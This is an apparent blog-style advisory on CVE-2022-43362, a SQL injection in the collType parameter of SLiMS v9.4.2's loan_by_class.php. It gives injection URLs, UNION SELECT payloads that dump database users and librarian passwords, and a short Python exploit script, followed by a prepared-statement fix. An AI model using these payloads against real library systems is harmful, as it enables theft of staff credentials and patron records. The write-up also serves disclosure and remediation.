CVE-2022-43362 - SQL Injection in Senayan Library Management System v9.4.2 (loan_by_class.php Vulnerability Explained with Exploit Code)

In late 2022, security researchers uncovered a significant vulnerability in the popular Senayan Library Management System (SLiMS), a tool widely used by libraries worldwide for efficient library management. The vulnerability, catalogued as CVE-2022-43362, allows attackers to perform SQL injection through the collType parameter in the loan_by_class.php script.

This long-read will break down how this SQL Injection works, provide simple and exclusive explanations, share a proof-of-concept exploit, and discuss how to defend your SLiMS install. If you run or manage a library using SLiMS v9.4.2 (or variants), read carefully—you may be at risk.

What is Senayan Library Management System (SLiMS)?

SLiMS is a free, open-source, web-based library management system used globally by community and institutional libraries. It helps manage collections, loans, memberships, and a lot more. Being widely used, SLiMS becomes a frequent target for attackers seeking out web vulnerabilities.

What’s the Problem in v9.4.2?

In version 9.4.2, the loan_by_class.php page fails to properly sanitize input from the collType GET parameter. Attackers can inject their own SQL statements, possibly accessing, exfiltrating, or even altering the underlying database.

In loan_by_class.php, code similar to the following might exist

<?php
// Example, for illustration only
$collType = $_GET['collType'];
$sql = "SELECT * FROM loans WHERE collection_type = '$collType'";
$result = mysqli_query($db, $sql);
// ...
?>

Notice: $collType comes directly from GET parameters and drops into an SQL query without any sanitization.

If you visit

http://your-library-site/loan_by_class.php?collType=Textbook

…the page works fine. But what if you visit

http://your-library-site/loan_by_class.php?collType=Textbook'%20OR%201=1--+

The resulting SQL becomes

SELECT * FROM loans WHERE collection_type = 'Textbook' OR 1=1-- '

Here, the OR 1=1-- clause makes the SQL always return all loans, potentially exposing confidential data, and opening the door for much more sinister attacks.

The CVE Advisory

- CVE ID: CVE-2022-43362

References

- NVD Entry
- Packet Storm Advisory
- Senayan’s GitHub Repository

Suppose the application is hosted at this address

http://library.example.com/loan_by_class.php

Test Parameter

collType=%27 OR 1=1--+

Full URL

http://library.example.com/loan_by_class.php?collType=%27%20OR%201=1--+

If results are wildly different (all loan data exposed), you’ve likely confirmed the vulnerability.

3. Information Disclosure

Suppose you want to extract current database user. The classic way is to close the original quote, insert a union select, and comment out the rest:

http://library.example.com/loan_by_class.php?collType=' UNION SELECT user(),2,3,4--+

*(Note: The actual number of columns in the result must match the original SQL's select statement. You may have to experiment.)*

Sample Exploit Script (Python)

import requests

target = 'http://library.example.com/loan_by_class.php'
payload = "' UNION SELECT user(),database(),3,4--+"  # Adjust columns as needed
r = requests.get(target, params={'collType': payload})
print(r.text)

Almost any data can be dumped with a similar approach

http://library.example.com/loan_by_class.php?collType=' UNION SELECT username,password,3,4 FROM librarians--+

Warning: Actually dumping user or password data is illegal without authorization.

- Sanitize All Input: Use prepared statements or parameterized queries in PHP

$stmt = $db->prepare("SELECT * FROM loans WHERE collection_type = ?");
$stmt->bind_param("s", $collType);
$stmt->execute();
$result = $stmt->get_result();

- Update to the Latest Version: Always monitor Senayan’s official updates for security updates.

Official References

- NIST NVD: CVE-2022-43362
- Exploit Details: Packet Storm SLiMS 9.4.2 SQL Injection
- SLiMS Repository: slims9_bulian on GitHub

Conclusion

CVE-2022-43362 is a serious SQL Injection flaw affecting Senayan Library Management System v9.4.2. If left unpatched, it exposes libraries to data theft and database manipulation. The best fix is immediate upgrade, vigilant sanitization, and ongoing awareness of new vulnerabilities.

If you’re in charge of a SLiMS-powered library, patch now—or risk the integrity of your users and collections.

Timeline

Published on: 11/01/2022 19:15:00 UTC
Last modified on: 11/02/2022 15:38:00 UTC